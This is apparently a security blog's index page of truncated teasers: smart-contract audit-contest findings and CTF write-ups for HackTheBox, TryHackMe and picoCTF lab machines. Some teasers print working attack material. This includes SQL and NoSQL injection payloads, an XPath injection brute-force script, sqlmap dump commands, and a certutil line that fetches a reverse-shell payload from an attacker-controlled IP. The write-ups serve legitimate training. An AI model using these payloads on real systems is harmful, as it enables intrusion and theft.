Access control who?
The short version I took part in the OneShot audit contest on Codehawks and reported a High-rated vulnerability. The issue lies in the lack of access control on the NFTs used to battle: it is possible for any user to send someone else's NFT to battle. This can represent an unfair advantage, if an attacker decides to use an NFT stronger than the one they own to have better chances of winning the battle. Here is the full report I submitted to the judges of this contest, along with a PoC to exploi...
Read post
Agree to disagree
The short version I took part in the OneShot audit contest on Codehawks and reported two High-severity vulnerabilities regarding a game-theory flaw in their matchmaking process. However, the judge did not agree, calling the protocol implementation a "design decision" instead of a vulnerability. In the litigation period, I submitted my thoughts concerning how this design decision would actually cause the protocol to come to a full halt, given enough time, but my concerns were disregarded saying ...
Read post
All known and no random makes users dull
The contest I took part in the OneShot audit contest on Codehawks and obtained a High-severity vulnerability regarding the use of randomness on-chain, a typical, difficult-to-solve issue that affects many protocols. Using randomness in an environment where everything is deterministic and publicly known is not that easy, unfortunately. When implemented poorly, the use of weak randomness can completely compromise the purpose of a protocol, as was the case here. The short version The protocol f...
Read post
My $0.01
I participated in the "The Standard" audit contest on Codehawks, and identified a High-severity vulnerability. The issue is related to the usage of a loop over an unbounded data structure, which can cause different users to incur very different gas costs: so much so, that a late user might have to face gas costs so high to effectively discourage him to take part in the protocol AT ALL. Of course, no protocol wants to draw users away simply through poor coding practices, so the vulnerability was...
Read post
The gas war
Introduction I thought I had a high. I participated in the Voting Booth bug bounty and reported a high-rated vulnerability. But it was rejected. Because I did not read a key piece of information that rendered all my thought process completely useless. Let's see what it was. Let us reopen the imaginary wound. The source code You can find the source code on my other blog post, the triumphant one about the bug that was, indeed, approved and validated. It is here, if you are interested. What fol...
Read post
The Bug of Confusion
The Contest Just before Christmas, the team at Codehawks created a bug bounty challenge to mimic one bug they encountered during one of their assessments. The challenge was to identify the same bug they reported during a real audit and report it as in a bug bounty program. The code base, shown right here, was simplified for the sake of clarity: // SPDX-License-Identifier: MIT pragma solidity ^0.8.23; import {Math} from "@openzeppelin/contracts/utils/math/Math.sol"; // @title VotingBooth // @a...
Read post
N out of M
The Audit In one of our most recent security reviews at Inference, we run into an interesting situation, which is discussed in this blog post. The premise is that of a smart contract with a simple access control mechanism: In order to change a storage variable, you have to be in possession of at least N out of M passwords This is a gigantic simplification of the original situation, however, it will help to discuss the interesting bug without getting lost in unnecessary details. The Smart C...
Read post
Tincho fuzz test
The Tincho Exercise While taking a look at Cyfrin Updraft, more on that in a later post, potentially, instructor Patrick Collins highly suggests to take onto a small challenge: a fuzz test exercise proposed by Tincho. You can find the repo of the challenge here. While Tincho already suggests his own solution right underneath the exercise, I thought to write this to go through my thought process developing the test, as it turned out to be structurally different, and equally effective, as Tincho...
Read post
Damn Vulnerable DeFi - Puppet v2
The contract The developers of the previous pool seem to have learned the lesson. And released a new version! Now they’re using a Uniswap v2 exchange as a price oracle, along with the recommended utility libraries. That should be enough. You start with 20 ETH and 10000 DVT tokens in balance. The pool has a million DVT tokens in balance. You know what to do. The only contract associated with the challenge is the following one: contract PuppetV2Pool { using SafeMath for uint256; addre...
Read post
Damn Vulnerable DeFi - Puppet
The contract There’s a lending pool where users can borrow Damn Valuable Tokens (DVTs). To do so, they first need to deposit twice the borrow amount in ETH as collateral. The pool currently has 100000 DVTs in liquidity. There’s a DVT market opened in an old Uniswap v1 exchange, currently with 10 ETH and 10 DVT in liquidity. Pass the challenge by taking all tokens from the lending pool. You start with 25 ETH and 1000 DVTs in balance. contract PuppetPool is ReentrancyGuard { using Address f...
Read post
Damn Vulnerable DeFi - Compromised
The contract Starting with just 0.1 ETH in balance, pass the challenge by obtaining all ETH available in the exchange. We also receive two very long strings as part of the challenge: 4d 48 68 6a 4e 6a 63 34 5a 57 59 78 59 57 45 30 4e 54 5a 6b 59 54 59 31 59 7a 5a 6d 59 7a 55 34 4e 6a 46 6b 4e 44 51 34 4f 54 4a 6a 5a 47 5a 68 59 7a 42 6a 4e 6d 4d 34 59 7a 49 31 4e 6a 42 69 5a 6a 42 6a 4f 57 5a 69 59 32 52 68 5a 54 4a 6d 4e 44 63 7a 4e 57 45 35 4d 48 67 79 4d 44 67 79 4e 44 4a 6a 4e 44 42 68...
Read post
Damn Vulnerable DeFi - Selfie
The contract A new cool lending pool has launched! It’s now offering flash loans of DVT tokens. It even includes a fancy governance mechanism to control it. What could go wrong, right ? You start with no DVT tokens in balance, and the pool has 1.5 million. Your goal is to take them all. The challenge has an interface which you shouldn't care too much about. The other contracts are more interesting, here are the key points about each of them. First, the contract offering the flash loan funct...
Read post
Damn Vulnerable DeFi - The Rewarder
The contract There’s a pool offering rewards in tokens every 5 days for those who deposit their DVT tokens into it. Alice, Bob, Charlie and David have already deposited some DVT tokens, and have won their rewards! You don’t have any DVT tokens. But in the upcoming round, you must claim most rewards for yourself. By the way, rumours say a new pool has just launched. Isn’t it offering flash loans of DVT tokens? This time there are multiple contracts. Two of them are just the contracts that rep...
Read post
Damn Vulnerable DeFi - Side Entrance
The contract The goal is to drain a pool that offers flash loans. The issue lies in the usage of an interface without any restriction on the msg.sender, that can implement that interface and perform any action. The solution The interesting part of the challenge contract is this function: function flashLoan(uint256 amount) external { uint256 balanceBefore = address(this).balance; IFlashLoanEtherReceiver(msg.sender).execute{value: amount}(); if (address(this).balance &...
Read post
Damn Vulnerable DeFi - Truster
The contract There is a pool containing 1 million DVT. The task is to drain it starting from nothing. The solution The contract is extremely short, here it is: // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; import "@openzeppelin/contracts/utils/Address.sol"; import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; import "../DamnValuableToken.sol"; /** * @title TrusterLenderPool * @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz) */ contract TrusterLenderPool ...
Read post
Damn Vulnerable DeFi - Naive Receiver
The contract The contract emulates a flash loan functionality. The challenge is to steal 10 ETH from the "receiver" user, while using the address whose alias is "player". The solution Each time a user requests a flash loan, they have to pay 1 ETH as a fee. In order to steal 10 ETH from a user, we can request 10 flash loans from their account. This is possible because the "flashLoan" functionality has no access control, so anyone can request flash loans for any other user by specifying their a...
Read post
Damn Vulnerable DeFi - Unstoppable
The contract The goal is to stop the flash loan functionality. The vault has a function called "flashLoan" that will revert in four different scenarios. Among these, the one that we can control that will make the function fail for all users is the third one, that checks whether "totalSupply" is different than "balanceBefore". if (convertToShares(totalSupply) != balanceBefore) revert InvalidBalance(); "totalSupply" represents the number of existing tokens: if we analyze ERC20.sol, we can see i...
Read post
Carpediem - HTB - Key Points
Target's IP: 10.10.11.167PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpHostname revealed: carpediem.htbThrough subdomain enumeration, we can find a new domain name as well: portal.carpediem.htbThere is a request subject to SQL injection:GET /?p=bikes&c=c4ca4238a0b923820dcc509a6f75849b'%2b(selectfrom(select(sleep(20)))a)%2b'Automating with SQLmap, we can dump the entire database, including the admin's hash:1,uploads/1635793020HONDAXADV.png,Male,<blank>,jhammond@carpediem.htb,Hamm...
Read post
Health - HTB - Key Points
Target's IP: 10.10.11.176Hostname: health.htbThe functionality of the website calls for SSRF, and it is, indeed, the case. We can bypass the filter on the website using an open redirect, as shown on Hacktricks.Redirecting to the filtered port on 3000, we get the source code of a Gogs page. Checking for Gogs on the internet, there is a known SQLinjection vulnerability we can exploit:python2 redirect.py --port 80 --ip 10.10.14.40 "http://10.10.11.176:3000/api/v1/users/search?q=e')/**/union/**/all/...
Read post
MetaTwo - HTB - Key Points
Target's IP: 10.10.11.186PORT   STATE SERVICE21/tcp open  ftp22/tcp open  ssh80/tcp open  httpUnknown host: metapress.htbProudly powered by WordPress. Let's enumerate using wpscan.[i] Plugin(s) Identified:                                                                                                                                                                                                                                                                                                 [+] bo...
Read post
BabyEncryption - HTB - Challenges
import string#from secret import MSG#ct = encryption(MSG)f = open('./msg.enc','r')text = bytes.fromhex(f.readline())result = ""alphabet = string.printablefor char in text:    for letter in alphabet:        if((123 * ord(letter) + 18 ) % 256 == char):            result += letterprint(result) ...
Read post
Toxic - HTB - Challenges
Challenge's address: 139.59.189.189:32670Checking out the source code attached to the challenge, it's easy to spot the call to unserialize. Following this blog post, https://snoopysecurity.github.io/web-application-security/2021/01/08/02_php_object_injection_exploitation-notes.html, we note that the only model defined in the challenge also calls the destruct magic method, which will help us in our exploitation.The method includes files, so it will allow us to read, we have a LFI on our hands. Fi...
Read post
Ambassador - HTB - Key Points
Target's IP: 10.10.11.183PORT     STATE SERVICE22/tcp   open  ssh80/tcp   open  http3000/tcp open  ppp3306/tcp open  mysqlGrafana on 3000 subject to unauthorized arbitrary file read, as per https://www.exploit-db.com/exploits/50581 Reading passwd, consul and grafana and developer are users on the boxGoogling for common configuration files, we can read /etc/grafana/grafana.ini# Either "mysql", "postgres" or "sqlite3", it's your choice;type = sqlite3;host = 127.0.0.1:3306;name = grafana;user = roo...
Read post
Phonebook - HTB - Challenges
To exploit the wildcard SQL injection, this script helps us to identify the username:import requestsimport stringalphabet = string.digits + string.asciilowercase + string.asciiuppercase + string.punctuationword = ''while(True):    for letter in alphabet:        x = requests.post('http://165.22.122.58:31348/login', data = {'username': word + letter + '', 'password': ''})        if x.url == 'http://165.22.122.58:31348/':            word = word + letter            print(word)With a slight modificat...
Read post
Shared - HTB - Key Points
Target's IP: 10.10.11.172PORT    STATE SERVICE22/tcp  open  ssh80/tcp  open  http443/tcp open  httpsRoot page / redirects to: http://shared.htbSubdomain enumeration returns checkout as a valid subdomain, so we also add checkout.shared.htb to the hosts file.Ecommerce software by Prestashop seems subject to an exploit, more specifically https://www.exploit-db.com/exploits/45964, but I was not able to make it work.customcart cookie is injectable, the answer when requesting the page on the checkout ...
Read post
UpDown - HTB - Key Points
Target's IP: 10.10.11.177PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpConnecting to the website leaks a domain name, siteisup.htbRecursive brute forcing of directories reveals the following two ones:/dev/dev.gitDownloading the .git is easy thanks to directory indexing, just run wget -r http://siteisup.htb/dev/.gitAnalyzing the git repo, there is an interesting commit we must checkout:commit 8812785e31c879261050e72e20f298ae8c43b565Author: Abdou.Y <84577967+ab2pentest@users.noreply.gith...
Read post
Faculty - HTB - Key Points
Target's IP: 10.10.11.169PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httphttp-title: Did not follow redirect to http://faculty.htbJavascript on login page suggests that if you intercept response and change 3 to 1 you can bypass logincblake@faculty.htbejames@faculty.htbjsmith@faculty.htbsqlmap -u 'http://faculty.htb/view_schedule.php?id=1' -T users --dumpAdministrator | 1    | 1fecbe762af147c1176a0fc2c722a345 | adminGenerating PDFs as an authenticated user, you can see that the tool used to ...
Read post
Shoppy - HTB - Key Points
Target's IP: 10.10.11.180PORT     STATE SERVICE22/tcp   open  ssh80/tcp   open  http9093/tcp open  copycatThe login suffers from NoSQL injection, we can bypass the login stage withusername=admin'||'1==1//&password=aaasa Again, injecting the  user search and downloading the export:username "admin"password "23c6877d9e2b564ef8b32c3a23de27b2" username "josh"password "6ebcea65320589ca4f2f1ce039975995"These look like md5 hashes, trying hashcat to crack them:6ebcea65320589ca4f2f1ce039...
Read post
Photobomb - HTB - Key Points
Target's IP: 10.10.11.182PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpTrying to connect to the web server reveals an important information:Unknown host: photobomb.htbConnecting to the web server returns 401 - Unauthorized to all requests, but from the developer tools we see that the page includes a Javascript file that contains sensitive information:function init() {  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me  if (document.cookie.match(/...
Read post
Support - HTB - Key Points
Target IP: 10.10.11.174 nmap -sS -p- -T4 --min-rate=10000 10.10.11.174 Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-12 09:18 CEST Nmap scan report for 10.10.11.174 Host is up (0.11s latency). Not shown: 65516 filtered tcp ports (no-response) PORT      STATE SERVICE 53/tcp    open  domain 88/tcp    open  kerberos-sec 135/tcp   open  msrpc 139/tcp   open  netbios-ssn 389/tcp   open  ldap 445/tcp   open  microsoft-ds 464/tcp   open  kpasswd5 593/tcp   open  http-rpc-epmap 636/tcp   open  ldap...
Read post
Trick - HTB - Key Points
Target's IP: 10.10.11.166nmap -sS -p- -T4 --min-rate=10000 10.10.11.166PORT   STATE SERVICE22/tcp open  ssh25/tcp open  smtp53/tcp open  domain80/tcp open  http└─# nslookup> server 10.10.11.166Default server: 10.10.11.166Address: 10.10.11.166#53> 10.10.11.166166.11.10.10.in-addr.arpa       name = trick.htb.We add this domain name to our /etc/hosts file. Now we can enumerate further for subdomains.Asking for a zone transfer withdig axfr trick.htb @trick.htb reveals a new subdomain, preprod-...
Read post
Vulnnet Endgame - THM - Key Points
Initial scan reveals 22 and 80. We also have a domain name from the introduction of the box, so we can enumerate for subdomainsRun gobuster vhost -u http://vulnnet.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txtI found 4 more valid domains, blog, api, shop and admin1Brute forcing for directories in the admin1 domain reveals some interesting ones, like vendor, fileadmin, typo3temp, typo3Typo3 seems to be an open source CMS, we lack credentials to login thoughAnalyzing th...
Read post
RingZer0CTF - Hash me if you can
We need to create a small script in order to be quick enough to solve this challenge, as we cannot possibly copy the message, hash it and send the correct request in under two seconds.The script to solve this challenge is fairly straightforward, here it is:import requestsimport hashlibx = requests.get('http://challenges.ringzer0team.com:10013/')if '----- BEGIN MESSAGE -----' in x.text:    start = x.text.index('----- BEGIN MESSAGE -----') + len('----- BEGIN MESSAGE -----') + 15 #15 is required to...
Read post
Nunchuks - HTB - Key Points
Open ports: 22, 80 and 443 after a super quick scanCertificate from 443 reveals a domain, nunchucks.htbSubdomain enumeration reveals another possible target, store.nunchucks.htbThe store has a newsletter subscription function that reflects the email address provided. Using Wappalyzer, we can see the website is running on NodeJS, so let's look for SSTI on NodeJSHacktricks suggests the following payload to try out: {{7*7}}. This should return 49. It is the payload listed under the template engine ...
Read post
Shocker - HTB - Key Points
Open port on 80 and a 2222 which is actually an SSH over deeper inspection (detect the specific port using sV in nmap)Enumeration of the web server won't reveal much besides a cgi-bin directory, fuzzing for scripts returns a user.sh scriptWe can try and exploit this with Shellshock, using the metasploit module exploit/multi/http/apache_mod_cgi_bash_env_exec. This gives us low privileged access on the boxRunning "id" we see our user is part of the lxd group, meaning we can immediately escalate to...
Read post
basic-mod-2 - picoCTF 2022
import stringalphabet = string.asciiuppercase + string.digits + ""code = "104 85 69 354 344 50 149 65 187 420 77 127 385 318 133 72 206 236 206 83 342 206 370"words = code.split(" ")result = ""for word in words:    module = int(word) % 41    for i in range (41):        if((module * i ) % 41 == 1 ):            result += alphabet[i-1]            breakprint(result) ...
Read post
basic-mod-1 - picoCTF 2022
import stringalphabet = string.ascii_uppercase + string.digits + "_"code = "202 137 390 235 114 369 198 110 350 396 390 383 225 258 38 291 75 324 401 142 288 397"words = code.split(" ")result = ""for word in words:    result += alphabet[int(word) % 37]print(result) ...
Read post
substitution0, 1 and 2 - picoCTF 2022
Uncomment cipher, plain and crypt to solve either the first, second or third substitution challenge.Always start with the assumption that the last few words are "the flag is picoCTF{<something>}" and you already have the substitution for some of the letters. With these, you can try to understand what is missing looking at the English text and add letters to the substitution until you get a fully formed text (and the flag).#cipher = '''QWITJSYHXCNDFERMUKGOPVALBZ #Hjkjpmre Djykqet qkrgj, axo...
Read post
transposition-trial - PicoCTF 2022
cipher = "heTfl g as iicpCTo{7F4NRP051N51635P3X51N3_V091B0AE}2"result = ""for i in range(2, len(cipher), 3):    result += cipher[i] + cipher[i-2] + cipher [i-1]    print(result)     ...
Read post
Most Cookies - PicoCTF
Followed explanation at this linkJust remember to put your cookie inside the cookie variable and update the wordlist with the possible secrets used to sign the cookie.import flaskimport hashlibfrom sys import argvfrom flask.json.tag import TaggedJSONSerializerfrom itsdangerous import URLSafeTimedSerializer, TimestampSigner, BadSignaturecookie = 'eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.Yh4n3A.tAnfOTWKodF6TbdczS-Pt-JPzdM'wordlist = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbre...
Read post
caas - PicoCTF
Look at the JS provided, while at a first look you might think there might be some SSTI involved, once you look at the code it's clear: Node runs a system command inserting user input. We only need to stop the current program's execution and start something more useful. A combination of a semicolon and anything else you might want to use is fine. For example, I used ls to see file names in the current directory and then printed the one that interested me, like this:https://caas.mars.picoctf.net/...
Read post
X marks the spot - pico
import requestsimport stringchars = string.ascii_lowercase + string.ascii_uppercase + string.digits + "}_"flag = "picoCTF{"while True:    for char in chars:        result = requests.post("http://mercury.picoctf.net:20297/", data = {"name": "' or //*[starts-with(text(), '"+flag+char+"')] or 'a'='b", "pass":"pass"})        if "right path" in result.text:            flag += char            print("Added char: " + flag)            break ...
Read post
Zeno - THM
At first, after a basic scan, there is only a 12340 TCP port open and SSH on 22. Connecting to it using netcat reveals this is an Apache 2.4.6 webserver, running on PHP 5.4.16.Using a directory scanner, we find out there is RMS installed on the webserver.In our manual scraping of the website, we can notice that, once we create an account, we get a sample message from an account called "administrator", and in the Contact Us section there is an email address that is registered to the domain pathfi...
Read post
Skynet - THM - Braindump
There is a web server and samba running, automatically scan both using dirb and enum4linux.The web page served is a useless search, nothing in the source code either.There is anonymous listing enabled on the samba server, there are some directories to examine.Dirb returned a login form exposed on a /squirrelmail directory, there is also a version number: 1.4.23There is a known RCE for this version, but requires login credentials. Maybe we have a username (milesdyson) but password?In the meanwhil...
Read post
Alfred - THM - Braindump
There are two web servers, one on 80 revealing an email address, and one on 8080 that is a Jenkins login page. Jenkins has, notoriously, a poor password policy.Searching on Google, default is admin. Tried simple combinations, admin:admin worked.We can modify the configuration for the existing project and insert a build command to run when building it, we can try to launch a reverse shell from it.We can use this command in the build:certutil.exe -urlcache -split -f http://10.9.4.63:8000/Advanced....
Read post
Steel Mountain - THM - Braindump
After an initial scan, there are ports that suggest this is a Windows box. There is also a web server on 80, shows an image and nothing more. Nothing found using dirbuster.There is also another web server, on 8080. Reading the source of the page, this shows a name and a version, Rejetto HFS 2.3. There are some known RCE exploits for this specific version, one in metasploit called exploit/windows/http/rejettohfsexec, let's try this one. Seems to work, meterpreter shell opened. We are user bill in...
Read post
Road - THM
Road - THMThere is an SSH port open and a web server. With no credentials, the web server is a better option right now.I started by looking around the website: there is the information about who created the platform right in front of you, but I could not turn that into valuable info with a basic search. I registered an account and logged in. Snoop around the authenticated pages, and you see there is a functionality to upload a profile picture, but it is admin-only. However, this tells us the ema...
Read post
speeds and feeds - PicoCTF
Once you connect to the given address, you get a very long list of strings that make no sense. I tried to look at them to find some sort of pattern, but nothing caught the eye, so I copied one of the lines and pasted it into the search bar. Google suggests this might be something called G-code. Turns out, it is a programming language for machines and you can find online interpreters to plot the code you have been given, which will show you the flag. The interpreter I used is at https://ncviewer....
Read post
The numbers - PicoCTF
Open the file, it contains a long list of numbers. These are very low in value, so it is clearly not ASCII. Actually, these are so low that they might just be references to the letters' positions in the alphabet. Turns out, this is all there is to this challenge. Easy peasy ;) ...
Read post
Glory of the garden - PicoCTF
The file you download contains a string that gives you the flag. It should have been my first attempt, but it was actually my fourth:opened the picture with eog to look at it, pointless;used exiftool to inspect metadata, pointless;used steghide to extract hidden data using a blank password and the passwords "garden" and "glorious", still pointless;ran strings on the file, success! ...
Read post
Transformation - PicoCTF
Translate the string into unicode and insert it into a variable, then treat the encryption as a mathematical function and try to obtain a reverse formula. Imagine that A and B are the characters that, when mixed as described in the challenge description, generate the first character of the encoded text. To retrieve A, just push the encoded character 8 places to the right, so to clean all values that were influenced by the value of B.To retrieve B, you now have the encoded value and A itself: wha...
Read post
Petshop Pro
HackerOne CTF - Petshop ProFlag 1When you go to checkout, you submit a URL-encoded body with the post. Insert a new object in there or modify an existing one and insert a negative price to gain a flag.Flag 2There is a login form (found through a directory bust). There is a logic error that helps you enumerating user, as a correct username will give you a different error message. Using hydra with rockyou for usernames turns up a valid username fairly quickly. Then you can just use this username a...
Read post
OWASP Juice Shop
OWASP Juice ShopThis is how I solved some of the challenges listed in the OWASP Juice Shop scoreboard, you can find the one that interests you by searching its name in the table.Error Handling (Provoke an error that is neither very gracefully nor consistently handled.)Try a URL of your choice to see if anything funny happens, some error handling practices could give you great results in terms of finding vulnerabilities. In this case, it reveals the framework AND it solves the challenge.Score Boa...
Read post
Empline - THM
Empline - THMAfter the initial scan there are three open ports. Two are clearly no-goes unless you feel like bruteforcing (which I would not suggest, unwise at least). Look up the web page, most links seem pointless but one gives away both a domain and, more importantly, a subdomain. Save both of them in your /etc/hosts and go take a look. The initial front page could not give you clearer instructions on what to do next. There is a software name and a version: Google this combination of informat...
Read post
Superspam - THM
Super-Spam - THMThe ports after the initial scan, apart from the usual service on port 80, are fairly uncommon, like FTP on 4019 and SSH on 4012. The first I tried (more because this is a CTF than anything else) is to anonymously login to FTP, which gave us access to quite a few files. From the note, we could assume adam and super-spam are usernames. We also learn that the capture file is a reminder of how the alien got in, so we download that for further analysis and give it to Wireshark. While...
Read post
Year of the Fox - THM
Year of the Fox - THMThere are three open ports, including samba and a web server. Access to the server is limited by HTTP Basic Authentication, and brute forcing it right now is not a viable option. We first try to enumerate domains, shares and users through enum4linux. Fortunately enough, the box allows to log in using null sessions, so enum4linux is capable of giving us some juicy info, including two usernames.We can try to brute force our access using these usernames either into samba or pas...
Read post
Year of the dog - THM
Year of the Dog - THMThe scan doesn't give you much to choose from, two open ports and no reasonable way of interacting with SSH, so let's start from HTTP.The web server seems to be a waiting queue, what for is unknown. How does the page determine your position in queue every time you reload the page? Cookies, indeed. The cookie is not immediately clear to decode, but you can easily spot some SQL injection possibility by adding a single quote at the end of it. Besides enumerating the DB, there i...
Read post
CMSpit
CMSpit - THMAfter the initial scan, there are two open ports. Brute forcing the first would be unreasonable without having even tried looking at the other one, so let's start from the web server. On the login page, right up front, notice the shiny name of this CMS. With the power of this knowledge, start asking Google and sooner rather than later you should encounter this. Follow what it says like you never followed any other instruction and in no time you should be able to change the admin's pa...
Read post
Sweettooth Inc
Sweettooth Inc. - THMThere are four open ports. Following the indications of the room, we further analyze the port running the DB. There is a metasploit module that can give you the version running, but it is not able to go past authentication. In order to find a database user, you can check if there are available endpoints under /debug... Mostly two, one gives you a username, the other one a whole lot of informations you will need to carefully look at.You need the username to answer one of the ...
Read post
Couch
Couch - THMScan the machine with a basic nmap scan (nothing too fancy needed) in order to answer the first question. If you ran a -A scan or just a -sV, you also have the answers to question two, three and four.Now, onto the researching side of the challenge. Honestly, with no prior experience with CouchDB, I basically ran into Google's arms and kindly encountered the awesome documentation where you can find everything you need. Take a couple of minutes, read it and you should have no issue find...
Read post
harder
harder - THM After an initial scan, three ports seem open. As we have nothing to try on these SSH ports, let's look at the web server. Every request seems to be a 404, but look at the request: it issues a cookie for a specific domain. This probably means virtual hosting is in place, so add the domain to your /etc/hosts'list and browse to the page. Both a directory scan and the hint hidden behind the login form (super default credentials, you can do it without brute forcing it) suggest the pres...
Read post
BlobBlog
BlobBlog - THM After the initial scan there are two open ports. With nothing to try on SSH, let's start with the web browser. Launch a directory bust and start looking around while it runs. There are a couple of comments on the front page, the default Apache initial page. The first one is base64+brainfuck and tells something about knocking on ports, suggesting to try ports 1, 3 and 5. The second one tells us a password, which is base58 encoded. Following the first hint, connect simultaneously ...
Read post
Lunizz CTF
Lunizz CTF - THM Run a scan to see what services are running. Once it's done, look at it: an exposed DB surely looks interesting. Default credentials don't seem to work, and we have no known exploit to run against the SSH server, so let's just focus on the HTTP server for now. Running a directory buster reveals some interesting files and directories, mainly:interesting.txt, where we can find credentials for the DB;whatever, which doesn't seem to be accessible for some DB error right now. Let's ...
Read post
VulnNet: Node
VulnNet: Node - THM There is a single open port, so you should probably start there. Watch closely, there is something odd with the requests. Why does the app use a cookie for a session that doesn't require any authorization whatsoever? Is it easy to guess the encoding and what the cookie is holding? Turns out, the cookie is base64 encoded and contains some JSON data. First attempt, I tried to turn from guest to admin, which is absolutely pointless. So I turned to Google, and asked him what ...
Read post
Smag Grotto
Smag Grotto - THM After a basic scan (nothing too fancy needed here) you should see two open ports. Let's set aside SSH for now and check out the website. There seems to be very little, but a quick directory bust reveals a useful file you can download and analyze. These file gives you three powerful pieces of information: Credentialsa subdomain where to use said credentialsthe path where to login with those Modify your /etc/hosts in order to reach the subdomain and log in the platform. This...
Read post
magician
magician - THM After the initial scan, there appear to be two open ports on the target. One of them should suggest to try the oldie-but-goodie anonymous session, which can give you a pretty powerful hint. Follow it and then watch what you have to face on the other port. This service suffers from the ImageMagick vulnerability known as ImageTragick, which leads to RCE. In order to exploit it you can:Create your own payload (but why reinvent the wheel, right?);PayloadsAllTheThings has an entire ...
Read post
Library
Library - THM Two ports open, and one is clearly the better choice to start snooping around. Not too much to look at, you can probably detect there are some useful informations displayed on the page (if we consider Lorem Ipsum useless, what is the only customized content on the page?). Use this information and the generous hint on robots.txt to start the most boring attack there is (sit and wait, go grab something to eat or drink or whatever suits you). Once you are in, the flag is there. And ...
Read post
Dav
DAV - THM Only one port open, so we better scan it thoroughly. A simple directory bust will reveal a directory that requires HTTP basic authentication, besides revealing the obvious service running on it. Default credentials are in place, so gaining access isn't all that difficult. In the file system shown there is a username and its hash, which are just the credentials you used to log (not sure, didn't crack the hash). With credentials for a webdav service, turn to the cadaver client. Search o...
Read post
Thompson
Thompson - THM This is an easy machine, fairly straightforward. Scan thoroughly as usual. Navigating to the port running an HTTP web server reveals an Apache version. Look for default credentials, try the first couple of them, should not be too hard. Once you have access to the manager application, there is both a manual way to exploit it (you can upload WAR files, search on Google for a step by step procedure to exploit this) and a metasploit module ready for you to use. This gives you shell...
Read post
Joker
HA Joker CTF - THM Run your favourite scan, there should be three ports open on this machine. At first, port 80 is the only viable option (the others are SSH and a web server on 8080 that requires a password). If you are a Batman fan, take the time to check out all the quotes, including the ones in the source code. They are pointless CTF-wise, but they are awesome. Find the secret directory using a buster (add common extensions so you are sure not to miss it, as I did). That file gives you a us...
Read post
Jack
Jack - THM It's a Wordpress blog, so usual user enumeration vulnerability due to the error message. Wp-scan identifies three users (jack, danny & wendy). Look around a while, but it seems clear very quickly that you should try your hand at brute forcing (not a fan, don't like this in challenges). I don't know if there is a different intended way to gain access, but this worked (although it took some time). I would suggest a brute force against Xmlrpc, and don't use a huge wordlist (rockyo...
Read post
Tokyo Ghoul
Tokyo Ghoul - THM As always, start with scanning and looking at what is up against you. A mindful nmap scan should tell you that FTP allows for anonymous login (if you like to run different scans, remember to always check for this manually, you never know). Inside the directories there is a whole bunch of files to grab, be sure to catch them all (wink). The binary can be analyzed with radare2. Analyze the check password function. Before calling strcmp it loads the parameters in rdi and rsi. ...
Read post
HaskHell
HaskHell - THM This room nudges you fairly clearly in the right directions, thus the short writeup, straight to the point as always. When you start off, you have two open ports, SSH and HTTP (although on an uncommon port). The professor's website clearly states you have the opportunity to upload some haskell. Find the directory where you can upload with some busting. If you, like me at the time of this writing, are no Haskell programmer, Google is your friend. Here I paste the code I used as up...
Read post
Reverse Engineering
Reverse Engineering - THM For this room I used radare2. I know people are very opinionated about their debuggers and language, feel free to complain. Seems I have been unable to post pictures, so just know that while you read you should be looking at your terminal after you issued the command pdf @ main in the radare console. Task 1 The main function, after symbols and entry points analysis, is more than you need to solve this task. I won't tell you where the password is, you should simpl...
Read post
Tony the tiger
Tony the Tiger - THM nmap -sT 10.10.242.59 -p-PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.7 ((Ubuntu))8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 The first flag, Tony's The blog on port 80 holds the first flag. Take a look at the different posts there. If you find yourself poking around too much, stop looking at what meets the eye and go for stego. In the first post, you sh...
Read post
Ninja Skills
Ninja Skills-THM  The room asks you to write some basic scripts to find the solutions to its answers. The scripts shown here won't be the most visually beautiful ones, but they will get the job done. All the scripts require a file with the file names provided in the room, one per line. We'll refer to this file as "filelist". Let's move on to question one: Which file is owned by the "best-group" group? while read line do echo $line; VAR1=$(find / -name "$line" -group "best-gro...
Read post